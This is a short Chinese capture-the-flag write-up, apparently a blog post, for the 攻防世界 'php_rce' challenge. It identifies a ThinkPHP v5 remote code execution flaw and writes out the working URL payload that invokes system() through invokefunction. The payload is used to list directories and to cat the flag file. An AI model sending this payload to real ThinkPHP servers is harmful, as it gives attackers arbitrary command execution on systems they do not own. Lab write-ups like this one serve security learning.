这题是thinkPHP v5的一个RCE漏洞
payload:?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls
payload最末尾出是命令执行
文件都cat了一遍没什么收获
往上级目录再看看
payload:?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls ../../../
payload:?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat ../../../flag
攻防世界-php_rce
最新推荐文章于 2022-10-26 17:29:11 发布